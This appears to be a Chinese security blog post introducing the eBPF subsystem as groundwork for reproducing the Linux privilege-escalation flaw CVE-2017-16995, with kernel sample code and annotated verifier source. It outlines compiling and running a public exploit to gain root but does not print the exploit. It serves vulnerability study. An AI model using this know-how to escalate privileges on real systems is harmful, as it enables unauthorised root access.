CVE-2017-16995是一个内核提权漏洞,最近PWN2OWN爆出了一个ebpf模块相关的提权漏洞,因此打算系统地学习一下ebpf这个内核模块,并复现和分析与之相关的内核漏洞,之前先知已经有rebeyond
前辈发了一篇分析深入分析Ubuntu本地提权漏洞—【CVE-2017-16995】,本篇文章将补充一部分ebpf的基础知识为之后的其他漏洞复现做准备。
漏洞存在于内核版本小于4.13.9
的系统中,漏洞成因为kernel/bpf/verifier.c
文件中的check_alu_op
函数的检查问题,这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击(内存破坏)或者提升到特权用户。
本次复现使用的是4.4.110
版本的内核,下载地址为Download。
下载源码之后编译内核得到二进制的内核文件,结合之前漏洞复现的文件系统启动qemu,使用exploit-db上的exp编译gcc ./poc.c -static -pthread -o poc
,打包进文件系统再重新启动qemu,运行编译后的文件即可提权成功。
ebpf是bpf模块的功能增强版本,我们先来了解一下bpf模块。BPF的全称为Berkeley Packet Filter
,顾名思义,这是一个用来做包过滤的架构。它也是tcpdump和wireshark实现的基础。BPF的两大核心功能是过滤和复制,以tcpdump为例,BPF一方面接受tcpdump经过libpcap转码后的滤包条件,根据这些规则过滤报文;另一方面也将符合条件的报文复制到用户空间,最终由libpcap发送给tcpdump。
BPF设计的架构如下,基本原理是网卡驱动在收到数据报文之后多出一条路径转发给内核的BPF模块,供其和用户态的程序交互使用。
我们这里使用tcpdump的-d参数查看我们过滤数据报文的实际规则,可以看到BPF有一套自己的指令集来过滤数据包。
╭─wz@wz-virtual-machine ~/Desktop/CTF/wangdingbei2020/zhuque/supersafe_vm ‹hexo*› ╰─$ sudo tcpdump -d -i ens33 tcp port 23 1 ↵ (000) ldh [12] (001) jeq #0x86dd jt 2 jf 8 #判断是否是ipv6,false则jmp到L8 (002) ldb [20] (003) jeq #0x6 jt 4 jf 19 (004) ldh [54] (005) jeq #0x17 jt 18 jf 6 (006) ldh [56] (007) jeq #0x17 jt 18 jf 19 (008) jeq #0x800 jt 9 jf 19 #判断是否是ipv4 (009) ldb [23] (010) jeq #0x6 jt 11 jf 19 #判断是否是tcp (011) ldh [20] (012) jset #0x1fff jt 19 jf 13 #检测是否是ip分片报文 (013) ldxb 4*([14]&0xf) (014) ldh [x + 14] #tcp报文中的src port位置 (015) jeq #0x17 jt 18 jf 16 (016) ldh [x + 16] #tcp报文中的dest port位置 (017) jeq #0x17 jt 18 jf 19 (018) ret #262144 #符合要求 (019) ret #0 #不符合要求
BPF采用的报文过滤设计全称是CFG((Computation Flow Graph))
,过滤器基于if-else的控制流图,具体的实现不再展开。
在内核filter文档有关于BPF开发的sample,每条指令的格式类似,都是一个32字节大小的结构体类型,code表明指令类型,k用来做一些跳转的value或其他用处。
struct sock_filter { /* Filter block */ __u16 code; /* Actual filter code */ __u8 jt; /* Jump true */ __u8 jf; /* Jump false */ __u32 k; /* Generic multiuse field */ };
BPF的交互过程也是类似的,可以总结为以下几个步骤:
sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))
创建一个raw socketsetsockopt(s, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)))
里的SO_ATTACH_FILTER
参数将bpf结构体传入内核bytes = recv(s, buf, sizeof(buf), 0);
recv函数来获取过滤的数据报文之后BPF引入了JIT
编译代码优化性能,引入了seccomp
功能添加沙箱,在kernel 3.15版本后引入了eBPF。
eBPF(extended BPF)引进之后之前的BPF被称为cBPF(classical BPF),相比于cBPF,eBPF做了很多大刀阔斧的改变,比如拿C写的BPF代码,基于map的全新交互方式,新的指令集,Verifier的引进等。
我们首先来看下eBPF的sample来了解基本的交互方式。
第一个示例只有一个.c文件,BPF代码需要自己构造,可以类比成C里嵌了汇编。
//./linux-4.4.110/samples/bpf/sock_example.c /* eBPF example program: * - creates arraymap in kernel with key 4 bytes and value 8 bytes * * - loads eBPF program: * r0 = skb->data[ETH_HLEN + offsetof(struct iphdr, protocol)]; * *(u32*)(fp - 4) = r0; * // assuming packet is IPv4, lookup ip->proto in a map * value = bpf_map_lookup_elem(map_fd, fp - 4); * if (value) * (*(u64*)value) += 1; * * - attaches this program to eth0 raw socket * * - every second user space reads map[tcp], map[udp], map[icmp] to see * how many packets of given protocol were seen on eth0 */ #include <stdio.h> #include <unistd.h> #include <assert.h> #include <linux/bpf.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <sys/socket.h> #include <arpa/inet.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <stddef.h> #include "libbpf.h" static int test_sock(void) { int sock = -1, map_fd, prog_fd, i, key; long long value = 0, tcp_cnt, udp_cnt, icmp_cnt; //[1]使用bpf_create_map函数新建一个map,其中map类型为BPF_MAP_TYPE_ARRAY,模拟一个数组 map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(key), sizeof(value), 256); if (map_fd < 0) { printf("failed to create map '%s'\n", strerror(errno)); goto cleanup; } //[2]编写eBPF代码,虽然指令集不同,但是跟x86的汇编代码非常类似 struct bpf_insn prog[] = { BPF_MOV64_REG(BPF_REG_6, BPF_REG_1), BPF_LD_ABS(BPF_B, ETH_HLEN + offsetof(struct iphdr, protocol) /* R0 = ip->proto */), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ BPF_LD_MAP_FD(BPF_REG_1, map_fd), BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 2), BPF_MOV64_IMM(BPF_REG_1, 1), /* r1 = 1 */ BPF_RAW_INSN(BPF_STX | BPF_XADD | BPF_DW, BPF_REG_0, BPF_REG_1, 0, 0), /* xadd r0 += r1 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */ BPF_EXIT_INSN(), }; //[3]使用bpf_prog_load函数加载eBPF代码到内核 prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog),"GPL", 0); if (prog_fd < 0) { printf("failed to load prog '%s'\n", strerror(errno)); goto cleanup; } //[4]sock绑定lo网卡 sock = open_raw_sock("lo"); //[5]eBPF代码绑定socket if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,sizeof(prog_fd)) < 0) { printf("setsockopt %s\n", strerror(errno)); goto cleanup; } //[5]执行eBPF代码,根据给定的key过滤数据包,输出value从而打印出每1s内不同类型的数据包个数 for (i = 0; i < 10; i++) { key = IPPROTO_TCP; assert(bpf_lookup_elem(map_fd, &key, &tcp_cnt) == 0); key = IPPROTO_UDP; assert(bpf_lookup_elem(map_fd, &key, &udp_cnt) == 0); key = IPPROTO_ICMP; assert(bpf_lookup_elem(map_fd, &key, &icmp_cnt) == 0); printf("TCP %lld UDP %lld ICMP %lld packets\n", tcp_cnt, udp_cnt, icmp_cnt); sleep(1); } cleanup: /* maps, programs, raw sockets will auto cleanup on process exit */ return 0; } int main(void) { FILE *f; f = popen("ping -c5 localhost", "r"); (void)f; return test_sock(); }
第二个示例的功能和第一个一致,因此我们不再增加注释,只是给大家展示另一种eBPF开发的方式,也就是用C的形式写eBPF代码,这种写法大大解放了开发人员的工作。
首先编译sockex1_kern.c
到sockex1_kern.o
,在这个代码文件中定义了eBPF规则。
//./linux-4.4.110/samples/bpf/sock_example.c/sockex1_kern.c #include <uapi/linux/bpf.h> #include <uapi/linux/if_ether.h> #include <uapi/linux/if_packet.h> #include <uapi/linux/ip.h> #include "bpf_helpers.h" struct bpf_map_def SEC("maps") my_map = { .type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(u32), .value_size = sizeof(long), .max_entries = 256, }; SEC("socket1") int bpf_prog1(struct __sk_buff *skb) { int index = load_byte(skb, ETH_HLEN + offsetof(struct iphdr, protocol)); long *value; if (skb->pkt_type != PACKET_OUTGOING) return 0; value = bpf_map_lookup_elem(&my_map, &index); if (value) __sync_fetch_and_add(value, skb->len); return 0; } char _license[] SEC("license") = "GPL";
之后使用sockex1_user.c
加载eBPF代码到内核进而执行代码,过滤数据包得到vaule并输出。
#include <stdio.h> #include <assert.h> #include <linux/bpf.h> #include "libbpf.h" #include "bpf_load.h" #include <unistd.h> #include <arpa/inet.h> int main(int ac, char **argv) { char filename[256]; FILE *f; int i, sock; snprintf(filename, sizeof(filename), "%s_kern.o", argv[0]); if (load_bpf_file(filename)) { printf("%s", bpf_log_buf); return 1; } sock = open_raw_sock("lo"); assert(setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, prog_fd, sizeof(prog_fd[0])) == 0); f = popen("ping -c5 localhost", "r"); (void) f; for (i = 0; i < 5; i++) { long long tcp_cnt, udp_cnt, icmp_cnt; int key; key = IPPROTO_TCP; assert(bpf_lookup_elem(map_fd[0], &key, &tcp_cnt) == 0); key = IPPROTO_UDP; assert(bpf_lookup_elem(map_fd[0], &key, &udp_cnt) == 0); key = IPPROTO_ICMP; assert(bpf_lookup_elem(map_fd[0], &key, &icmp_cnt) == 0); printf("TCP %lld UDP %lld ICMP %lld bytes\n", tcp_cnt, udp_cnt, icmp_cnt); sleep(1); } return 0; }
以上就是两种eBPF开发的基本方式,可以看到C语言编写eBPF代码更加简洁,这也是eBPF相比于cBPF的一个优势。
首先我们调用bpf_create_map
来新建一个attr变量,这个变量为联合类型,其成员变量随系统调用的类型不同而变化,之后对变量成员进行初始化赋值,包括map类型,key大小,value大小,以及最打容量。
之后调用sys_bpf
进而使用系统调用syscall(__NR_bpf, BPF_MAP_CREATE, attr, size);
创建一个map数据结构,最终返回map的文件描述符。这个文件是用户态和内核态共享的,因此后续内核态和用户态都可以对这块共享内存进行读写(可以参见下面的bpf_cmd)。
//lib/bpf.c int bpf_create_map(enum bpf_map_type map_type, int key_size,int value_size, int max_entries) { union bpf_attr attr; memset(&attr, '\0', sizeof(attr)); attr.map_type = map_type; attr.key_size = key_size; attr.value_size = value_size; attr.max_entries = max_entries; return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); } //lib/bpf.c static int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr, unsigned int size) { return syscall(__NR_bpf, cmd, attr, size); } //bpf.h union bpf_attr { struct { /* anonymous struct used by BPF_MAP_CREATE command */ __u32 map_type; /* one of enum bpf_map_type */ __u32 key_size; /* size of key in bytes */ __u32 value_size; /* size of value in bytes */ __u32 max_entries; /* max number of entries in a map */ }; struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */ __u32 map_fd; __aligned_u64 key; union { __aligned_u64 value; __aligned_u64 next_key; }; __u64 flags; }; struct { /* anonymous struct used by BPF_PROG_LOAD command */ __u32 prog_type; /* one of enum bpf_prog_type */ __u32 insn_cnt; __aligned_u64 insns; __aligned_u64 license; __u32 log_level; /* verbosity level of verifier */ __u32 log_size; /* size of user buffer */ __aligned_u64 log_buf; /* user supplied buffer */ __u32 kern_version; /* checked when prog_type=kprobe */ }; struct { /* anonymous struct used by BPF_OBJ_* commands */ __aligned_u64 pathname; __u32 bpf_fd; }; } __attribute__((aligned(8))); //bpf.h /* BPF syscall commands, see bpf(2) man-page for details. */ enum bpf_cmd { BPF_MAP_CREATE, BPF_MAP_LOOKUP_ELEM, BPF_MAP_UPDATE_ELEM, BPF_MAP_DELETE_ELEM, BPF_MAP_GET_NEXT_KEY, BPF_PROG_LOAD, BPF_OBJ_PIN, BPF_OBJ_GET, };
之后调用bpf_prog_load
函数来将用户的eBPF代码加载到内核,我在内核文件中看到了两个同名不同参的函数定义,根据eBPF的调用情况应当是先调用libbpf的这个函数,之后通过系统调用调用后面的函数。
可以看到在使用BPF_PROG_LOAD
这个命令时,变量的数据类型又会发生改变,其成员包括指令类型,指令起始地址,指令条数,使用的license(要求是GPL),日志地址,日志大小以及日志等级等。随后使用系统调用syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
去运行真正的函数。
在第二个函数中添加了部分注释帮助理解,其核心是在运行eBPF代码前使用verifier进行代码检查并对指令进行修正防止产生恶意的代码跳转。
//libbpf.c int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version) { union bpf_attr attr = { .prog_type = prog_type, .insns = ptr_to_u64((void *) insns), .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = ptr_to_u64((void *) license), .log_buf = ptr_to_u64(bpf_log_buf), .log_size = LOG_BUF_SIZE, .log_level = 1, }; /* assign one field outside of struct init to make sure any * padding is zero initialized */ attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); } //syscall.c /* last field in 'union bpf_attr' used by this command */ #define BPF_PROG_LOAD_LAST_FIELD kern_version static int bpf_prog_load(union bpf_attr *attr) { enum bpf_prog_type type = attr->prog_type; struct bpf_prog *prog; int err; char license[128]; bool is_gpl; //检查成员 if (CHECK_ATTR(BPF_PROG_LOAD)) return -EINVAL; /* copy eBPF program license from user space */ if (strncpy_from_user(license, u64_to_ptr(attr->license), sizeof(license) - 1) < 0) return -EFAULT; license[sizeof(license) - 1] = 0; /* eBPF programs must be GPL compatible to use GPL-ed functions */ is_gpl = license_is_gpl_compatible(license); //指令最大条数为4096 if (attr->insn_cnt >= BPF_MAXINSNS) return -EINVAL; //检查指令类型和内核版本 if (type == BPF_PROG_TYPE_KPROBE && attr->kern_version != LINUX_VERSION_CODE) return -EINVAL; if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN)) return -EPERM; //创建prog结构体,用来存储eBPF指令和其他参数 /* plain bpf_prog allocation */ prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); if (!prog) return -ENOMEM; //获取锁 err = bpf_prog_charge_memlock(prog); if (err) goto free_prog_nouncharge; prog->len = attr->insn_cnt; //将用户的指令拷贝到prog结构体中 err = -EFAULT; if (copy_from_user(prog->insns, u64_to_ptr(attr->insns), prog->len * sizeof(struct bpf_insn)) != 0) goto free_prog; //默认的jitd为0 prog->orig_prog = NULL; prog->jited = 0; //设置引用计数为1 atomic_set(&prog->aux->refcnt, 1); prog->gpl_compatible = is_gpl ? 1 : 0; /* find program type: socket_filter vs tracing_filter */ err = find_prog_type(type, prog); if (err < 0) goto free_prog; //eBPF verifier会对我们的eBPF指令进行检查,一些恶意的代码或者死循环的将不会得到执行 /* run eBPF verifier */ err = bpf_check(&prog, attr); if (err < 0) goto free_used_maps; /* fixup BPF_CALL->imm field */ //修正指令中call和jmp的范围 fixup_bpf_calls(prog); /* eBPF program is ready to be JITed */ //JIT加载代码 err = bpf_prog_select_runtime(prog); if (err < 0) goto free_used_maps; err = bpf_prog_new_fd(prog); if (err < 0) /* failed to allocate fd */ goto free_used_maps; return err; free_used_maps: free_used_maps(prog->aux); free_prog: bpf_prog_uncharge_memlock(prog); free_prog_nouncharge: bpf_prog_free(prog); return err; }
之后调用setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,sizeof(prog_fd))
来执行eBPF代码,每一个socket数据包都会执行这个检查,从而实现包过滤。
eBPF也有一套自己的指令集,可以想象成实现了一个VM,其中有11个虚拟寄存器,根据调用规则可以对应到我们x86的寄存器中。
R0 -- RAX R1 -- RDI R2 -- RSI R3 -- RDX R4 -- RCX R5 -- R8 R6 -- RBX R7 -- R13 R8 -- R14 R9 -- R15 R10 -- RBP
每条指令的格式如下,成员包括操作码,目标寄存器,源寄存器,偏移和立即数。
struct bpf_insn { __u8 code; /* opcode */ __u8 dst_reg:4; /* dest register */ __u8 src_reg:4; /* source register */ __s16 off; /* signed offset */ __s32 imm; /* signed immediate constant */ };
操作码共有8种大类,以低3bit区分不同操作码,BPF_ALU为计算指令,BPF_MISC为其他指令,其他指令根据名字就可以猜到其含义。
/* Instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07
eBPF指令的编码如下,低三个bits被用来做指令大类的标志。这部分我参考了官方的手册,这里可以看到0x6和0x7两个指令名在源码中命名实际上是用BPF,这里只介绍eBPF。
+----------------+--------+--------------------+ | 4 bits | 1 bit | 3 bits | | operation code | source | instruction class | +----------------+--------+--------------------+ (MSB) (LSB) Classic BPF classes: eBPF classes: BPF_LD 0x00 BPF_LD 0x00 BPF_LDX 0x01 BPF_LDX 0x01 BPF_ST 0x02 BPF_ST 0x02 BPF_STX 0x03 BPF_STX 0x03 BPF_ALU 0x04 BPF_ALU 0x04 BPF_JMP 0x05 BPF_JMP 0x05 BPF_RET 0x06 BPF_JMP32 0x06 BPF_MISC 0x07 BPF_ALU64 0x07
当指令类型为BPF_ALU or BPF_JMP
,第4bit进行编码,BPF_K表示使用32位的立即数作为源操作数,BPF_X表示使用寄存器X作为源操作数。MSB的4bit表示操作数。
当指令类型为BPF_ALU or BPF_ALU64
,实际指令类型为以下之一,也就是常见的运算指令。
BPF_ADD 0x00
BPF_SUB 0x10
BPF_MUL 0x20
BPF_DIV 0x30
BPF_OR 0x40
BPF_AND 0x50
BPF_LSH 0x60
BPF_RSH 0x70
BPF_NEG 0x80
BPF_MOD 0x90
BPF_XOR 0xa0
BPF_MOV 0xb0 /* eBPF only: mov reg to reg */
BPF_ARSH 0xc0 /* eBPF only: sign extending shift right */
BPF_END 0xd0 /* eBPF only: endianness conversion */
当指令类型为BPF_JMP or BPF_JMP32
,指令实际类型为以下之一,包括条件跳转和非条件跳转。
BPF_JA 0x00 /* BPF_JMP only */ BPF_JEQ 0x10 BPF_JGT 0x20 BPF_JGE 0x30 BPF_JSET 0x40 BPF_JNE 0x50 /* eBPF only: jump != */ BPF_JSGT 0x60 /* eBPF only: signed '>' */ BPF_JSGE 0x70 /* eBPF only: signed '>=' */ BPF_CALL 0x80 /* eBPF BPF_JMP only: function call */ BPF_EXIT 0x90 /* eBPF BPF_JMP only: function return */ BPF_JLT 0xa0 /* eBPF only: unsigned '<' */ BPF_JLE 0xb0 /* eBPF only: unsigned '<=' */ BPF_JSLT 0xc0 /* eBPF only: signed '<' */ BPF_JSLE 0xd0 /* eBPF only: signed '<=' */
举个小例子,如BPF_ADD | BPF_X | BPF_ALU
表示的含义是dst_reg = (u32) dst_reg + (u32) src_reg
,BPF_XOR | BPF_K | BPF_ALU
表示src_reg = (u32) src_reg ^ (u32) imm32
。
代码检测是eBPF的核心机制,总的检测可以分成两次,第一次使用DAG检查来避免循环,主要是对代码进行有向无环图检测。
第二次的检测则是模拟代码的执行,观测寄存器的栈的变化情况。
主要的检测函数为bpf_check
,注释部分补充了一些实现逻辑。
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr) { char __user *log_ubuf = NULL; struct verifier_env *env; int ret = -EINVAL; //指令条数判断 if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS) return -E2BIG; /* 'struct verifier_env' can be global, but since it's not small, * allocate/free it every time bpf_check() is called */ env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL); if (!env) return -ENOMEM; env->prog = *prog; /* grab the mutex to protect few globals used by verifier */ mutex_lock(&bpf_verifier_lock); if (attr->log_level || attr->log_buf || attr->log_size) { /* user requested verbose verifier output * and supplied buffer to store the verification trace */ log_level = attr->log_level; log_ubuf = (char __user *) (unsigned long) attr->log_buf; log_size = attr->log_size; log_len = 0; ret = -EINVAL; /* log_* values have to be sane */ if (log_size < 128 || log_size > UINT_MAX >> 8 || log_level == 0 || log_ubuf == NULL) goto free_env; ret = -ENOMEM; log_buf = vmalloc(log_size); if (!log_buf) goto free_env; } else { log_level = 0; } /* look for pseudo eBPF instructions that access map FDs and * replace them with actual map pointers */ //将伪指令中操作map_fd的部分替换成map地址,注意这个地址是8字节的,因此在实现中用本指令的imm和下一条指令的2个4字节中存储了这个地址 /* store map pointer inside BPF_LD_IMM64 instruction insn[0].imm = (u32) (unsigned long) map; insn[1].imm = ((u64) (unsigned long) map) >> 32; */ ret = replace_map_fd_with_map_ptr(env); if (ret < 0) goto skip_full_check; env->explored_states = kcalloc(env->prog->len, sizeof(struct verifier_state_list *), GFP_USER); ret = -ENOMEM; if (!env->explored_states) goto skip_full_check; //控制流图检查死循环和不可能到达的跳转 ret = check_cfg(env); if (ret < 0) goto skip_full_check; env->allow_ptr_leaks = capable(CAP_SYS_ADMIN); //核心检查函数 ret = do_check(env); skip_full_check: while (pop_stack(env, NULL) >= 0); free_states(env); if (ret == 0) /* program is valid, convert *(u32*)(ctx + off) accesses */ ret = convert_ctx_accesses(env); if (log_level && log_len >= log_size - 1) { BUG_ON(log_len >= log_size); /* verifier log exceeded user supplied buffer */ ret = -ENOSPC; /* fall through to return what was recorded */ } /* copy verifier log back to user space including trailing zero */ if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) { ret = -EFAULT; goto free_log_buf; } if (ret == 0 && env->used_map_cnt) { /* if program passed verifier, update used_maps in bpf_prog_info */ env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt, sizeof(env->used_maps[0]), GFP_KERNEL); if (!env->prog->aux->used_maps) { ret = -ENOMEM; goto free_log_buf; } memcpy(env->prog->aux->used_maps, env->used_maps, sizeof(env->used_maps[0]) * env->used_map_cnt); env->prog->aux->used_map_cnt = env->used_map_cnt; /* program is valid. Convert pseudo bpf_ld_imm64 into generic * bpf_ld_imm64 instructions */ convert_pseudo_ld_imm64(env); } free_log_buf: if (log_level) vfree(log_buf); free_env: if (!env->prog->aux->used_maps) /* if we didn't copy map pointers into bpf_prog_info, release * them now. Otherwise free_bpf_prog_info() will release them. */ release_maps(env); *prog = env->prog; kfree(env); mutex_unlock(&bpf_verifier_lock); return ret; }
在这个函数中调用了do_check
根据不同的指令类型来做具体的合法性判断。使用的核心数据结构是reg_state
,bpf_reg_type
枚举变量用来表示寄存器的类型,初始化为NOT_INIT
struct reg_state { enum bpf_reg_type type; union { /* valid when type == CONST_IMM | PTR_TO_STACK */ int imm; /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct bpf_map *map_ptr; }; }; static void init_reg_state(struct reg_state *regs) { int i; for (i = 0; i < MAX_BPF_REG; i++) { regs[i].type = NOT_INIT; regs[i].imm = 0; regs[i].map_ptr = NULL; } /* frame pointer */ regs[BPF_REG_FP].type = FRAME_PTR; /* 1st arg to a function */ regs[BPF_REG_1].type = PTR_TO_CTX; } /* types of values stored in eBPF registers */ enum bpf_reg_type { NOT_INIT = 0, /* nothing was written into register */ UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */ PTR_TO_CTX, /* reg points to bpf_context */ CONST_PTR_TO_MAP, /* reg points to struct bpf_map */ PTR_TO_MAP_VALUE, /* reg points to map element value */ PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */ FRAME_PTR, /* reg == frame_pointer */ PTR_TO_STACK, /* reg == frame_pointer + imm */ CONST_IMM, /* constant integer value */ };
static int do_check(struct verifier_env *env) { struct verifier_state *state = &env->cur_state; struct bpf_insn *insns = env->prog->insnsi; struct reg_state *regs = state->regs; int insn_cnt = env->prog->len; int insn_idx, prev_insn_idx = 0; int insn_processed = 0; bool do_print_state = false; init_reg_state(regs); insn_idx = 0; for (;;) { struct bpf_insn *insn; u8 class; int err; //指令条数检查 if (insn_idx >= insn_cnt) { verbose("invalid insn idx %d insn_cnt %d\n", insn_idx, insn_cnt); return -EFAULT; } insn = &insns[insn_idx]; class = BPF_CLASS(insn->code); //运行过的次数上限检查 if (++insn_processed > 32768) { verbose("BPF program is too large. Proccessed %d insn\n", insn_processed); return -E2BIG; } //检测该指令有无visit,主要通过env->explored_states的状态数组保存访问过的指令的状态 err = is_state_visited(env, insn_idx); if (err < 0) return err; if (err == 1) { /* found equivalent state, can prune the search */ if (log_level) { if (do_print_state) verbose("\nfrom %d to %d: safe\n", prev_insn_idx, insn_idx); else verbose("%d: safe\n", insn_idx); } goto process_bpf_exit; } if (log_level && do_print_state) { verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx); print_verifier_state(env); do_print_state = false; } if (log_level) { verbose("%d: ", insn_idx); print_bpf_insn(env, insn); } //计算指令ALU if (class == BPF_ALU || class == BPF_ALU64) { //检查具体指令的合法性,比如是否使用了保留的field,使用的寄存器编号是否超过了模拟寄存器的最大编号,寄存器是否可读/写,寄存器值是否是指针等 err = check_alu_op(env, insn); if (err) return err; //BPF_LDX指令 } else if (class == BPF_LDX) { enum bpf_reg_type src_reg_type; /* check for reserved fields is already done */ /* check src operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) return err; err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK); if (err) return err; src_reg_type = regs[insn->src_reg].type; /* check that memory (src_reg + off) is readable, * the state of dst_reg will be updated by this func */ err = check_mem_access(env, insn->src_reg, insn->off, BPF_SIZE(insn->code), BPF_READ, insn->dst_reg); if (err) return err; if (BPF_SIZE(insn->code) != BPF_W) { insn_idx++; continue; } if (insn->imm == 0) { /* saw a valid insn * dst_reg = *(u32 *)(src_reg + off) * use reserved 'imm' field to mark this insn */ insn->imm = src_reg_type;//判断出了一种指令类型,即地址取值指令 } else if (src_reg_type != insn->imm && (src_reg_type == PTR_TO_CTX || insn->imm == PTR_TO_CTX)) { /* ABuser program is trying to use the same insn * dst_reg = *(u32*) (src_reg + off) * with different pointer types: * src_reg == ctx in one branch and * src_reg == stack|map in some other branch. * Reject it. */ verbose("same insn cannot be used with different pointers\n"); return -EINVAL; } //BPF_STX指令 } else if (class == BPF_STX) { enum bpf_reg_type dst_reg_type; if (BPF_MODE(insn->code) == BPF_XADD) { err = check_xadd(env, insn); if (err) return err; insn_idx++; continue; } /* check src1 operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) return err; /* check src2 operand */ err = check_reg_arg(regs, insn->dst_reg, SRC_OP); if (err) return err; dst_reg_type = regs[insn->dst_reg].type; /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, insn->src_reg); if (err) return err; if (insn->imm == 0) { insn->imm = dst_reg_type; } else if (dst_reg_type != insn->imm && (dst_reg_type == PTR_TO_CTX || insn->imm == PTR_TO_CTX)) { verbose("same insn cannot be used with different pointers\n"); return -EINVAL; } //BPF_ST指令 } else if (class == BPF_ST) { if (BPF_MODE(insn->code) != BPF_MEM || insn->src_reg != BPF_REG_0) { verbose("BPF_ST uses reserved fields\n"); return -EINVAL; } /* check src operand */ err = check_reg_arg(regs, insn->dst_reg, SRC_OP); if (err) return err; /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, -1); if (err) return err; //BPF_JMP指令 } else if (class == BPF_JMP) { u8 opcode = BPF_OP(insn->code); //直接跳转CALL if (opcode == BPF_CALL) { if (BPF_SRC(insn->code) != BPF_K || insn->off != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_CALL uses reserved fields\n"); return -EINVAL; } //在这个函数中会检查跳转的地址有无超过范围,函数的五个参数的参数类型(是否是key/value/map地址/stack_size等),更新返回值寄存器,更新reg_state等。 err = check_call(env, insn->imm); if (err) return err; } else if (opcode == BPF_JA) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_JA uses reserved fields\n"); return -EINVAL; } insn_idx += insn->off + 1; continue; } else if (opcode == BPF_EXIT) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_EXIT uses reserved fields\n"); return -EINVAL; } //r0保存返回值,bpf_exit为指令集合结束标志,在此之前检查有无写入值 /* eBPF calling convetion is such that R0 is used * to return the value from eBPF program. * Make sure that it's readable at this time * of bpf_exit, which means that program wrote * something into it earlier */ err = check_reg_arg(regs, BPF_REG_0, SRC_OP); if (err) return err; if (is_pointer_value(env, BPF_REG_0)) { verbose("R0 leaks addr as return value\n"); return -EACCES; } //遇到一个exit就结束一个分支,回退到分叉处执行另一个branch,类似于走迷宫遍历路径 process_bpf_exit: insn_idx = pop_stack(env, &prev_insn_idx); if (insn_idx < 0) { break; } else { do_print_state = true; continue; } } else { err = check_cond_jmp_op(env, insn, &insn_idx); if (err) return err; } } else if (class == BPF_LD) { u8 mode = BPF_MODE(insn->code); if (mode == BPF_ABS || mode == BPF_IND) { err = check_ld_abs(env, insn); if (err) return err; } else if (mode == BPF_IMM) { err = check_ld_imm(env, insn); if (err) return err; insn_idx++; } else { verbose("invalid BPF_LD mode\n"); return -EINVAL; } } else { verbose("unknown insn class %d\n", class); return -EINVAL; } insn_idx++; } return 0; } //很有意思的是我在这里发现了一个非递归的DFS伪代码,应该是拿来帮助读者理解check中深度优先算法实现的代码。 /* non-recursive DFS pseudo code * 1 procedure DFS-iterative(G,v): * 2 label v as discovered * 3 let S be a stack * 4 S.push(v) * 5 while S is not empty * 6 t <- S.pop() * 7 if t is what we're looking for: * 8 return t * 9 for all edges e in G.adjacentEdges(t) do * 10 if edge e is already labelled * 11 continue with the next edge * 12 w <- G.adjacentVertex(t,e) * 13 if vertex w is not discovered and not explored * 14 label e as tree-edge * 15 label w as discovered * 16 S.push(w) * 17 continue at 5 * 18 else if vertex w is discovered * 19 label e as back-edge * 20 else * 21 // vertex w is explored * 22 label e as forward- 